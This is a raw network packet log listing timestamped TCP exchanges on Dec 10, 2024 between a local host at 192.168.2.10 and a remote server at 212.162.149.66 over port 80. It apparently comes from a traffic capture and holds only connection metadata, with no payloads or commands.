                                         Dec 10, 2024 14:09:51.673574924 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:51.795128107 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.971339941 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.971466064 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:52.971940994 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.971949100 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.971956968 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.971993923 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:52.972007990 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.972019911 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:52.972042084 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.972043991 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:52.972136974 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:52.973244905 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.973445892 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:52.973633051 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.973639965 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.973645926 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:52.973712921 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.127928972 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.129810095 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.138727903 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.141444921 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.141676903 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.141684055 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.141736031 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.148200035 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.148206949 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.148258924 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.157284975 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.157291889 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.157346964 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.165158033 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.165294886 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.165383101 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.174262047 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.174269915 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.174319983 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.182152033 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.182400942 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.182511091 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.190587044 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.190875053 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.191051960 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.199368954 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.199428082 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.199634075 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.199693918 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.207480907 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.207606077 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.207721949 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.257169008 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.259150028 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.261123896 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.263415098 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.263592005 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.263598919 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.263643980 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.271814108 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.271821022 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.271913052 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.280205011 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.280328035 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.280384064 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.290381908 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.290390015 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:53.290467024 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:53.297624111 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.297632933 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.297755003 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.305977106 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.305990934 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.306047916 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.314301968 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.314644098 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.314713001 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.322598934 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.322693110 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.322787046 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.331244946 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.331253052 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.331340075 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.339653969 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.339900017 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.339955091 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.348059893 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.348432064 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.348448992 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.348480940 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.356560946 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.356754065 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.356837034 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.379698992 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.379705906 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.379800081 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.383691072 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.383702040 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.383766890 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.386107922 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.386178017 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.386349916 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.387414932 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.390342951 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.390348911 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.390558958 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.394541979 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.395056009 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.395102024 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.399081945 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.399091959 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.399219036 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.403130054 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.403136969 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.403184891 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.407753944 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.407761097 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.407826900 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.412312984 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.412319899 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.412364960 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.416291952 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.416410923 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.416487932 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.420455933 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.420610905 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.420667887 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.424940109 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.425055027 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.425126076 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.429106951 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.429205894 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.429250002 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.433415890 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.433703899 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.433789015 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.437781096 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.437943935 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.438005924 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.442337990 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.442729950 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.442792892 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.446377993 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.446444035 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.446491957 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.450697899 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.450705051 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.450756073 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.454658031 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.454731941 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.454762936 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.454806089 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.458839893 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.458858013 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.458935976 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.496375084 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.496397972 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.496483088 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.498343945 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.498349905 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.498431921 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.501791954 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.501945019 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.501998901 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.505955935 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.506055117 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.506098986 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.510485888 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.510579109 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.510649920 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.513432026 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.513438940 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.513509035 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.516706944 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.516817093 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.516859055 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.519648075 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.520108938 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.520152092 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.522551060 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.522614956 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.522833109 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.522870064 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.525324106 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.525599003 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.525665998 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.528162956 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.528472900 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.528526068 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.530914068 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.530967951 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.531024933 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.531419039 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.533694983 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.533704042 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.533752918 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.536334991 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.536389112 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.536483049 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.536537886 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.538909912 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.538964987 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.538996935 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.539408922 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.542088985 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.542095900 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.542165041 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.544187069 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.544194937 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.544233084 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.546550035 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.546587944 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.546700001 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.547056913 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.548969984 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.549248934 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.549304962 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.551263094 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.551270008 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.551356077 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.553817987 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.553829908 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.553951979 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.555949926 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.556086063 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.587212086 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.587280989 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.587523937 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.587625980 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.588197947 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.588265896 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.588418961 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.588505030 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.590306997 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.590420961 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.590761900 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.591414928 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.592381001 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.592463970 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.592871904 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.592922926 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.594460964 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.594505072 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.595846891 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.595913887 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.596524954 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.596565008 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.596815109 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.598557949 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.598655939 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.598884106 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.599416971 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.600634098 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.600696087 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.600864887 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.600960970 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.602773905 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.602822065 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.602977991 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.603037119 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.604856968 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.604945898 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.605453014 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.605508089 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.606914997 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.606975079 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.607018948 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.608918905 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.608961105 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.609705925 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.609766960 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.610946894 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.611018896 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.611872911 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.611938000 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.613009930 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.613049984 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.613209009 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.615444899 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.615968943 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.615976095 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.616019011 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.617583990 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.617649078 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.617750883 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.617808104 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.619405985 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.619414091 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.619666100 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.621159077 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.621303082 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.621371984 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.623241901 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.623286009 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.623420954 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.625408888 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.625441074 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.625459909 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.625535011 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.625593901 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.627553940 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.627559900 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.627600908 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.629514933 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.629623890 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.629687071 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.631725073 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.631731987 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.631791115 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.633630037 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.633687019 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.633713961 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.633765936 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.635885000 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.635891914 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.636003971 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.637511015 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.637572050 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.637648106 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.637860060 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.639611959 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.639658928 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.639681101 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.639729023 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.641406059 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.641453981 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.641511917 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                        Dec 10, 2024 14:09:53.643507004 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.643517017 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                        Dec 10, 2024 14:09:53.643573046 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
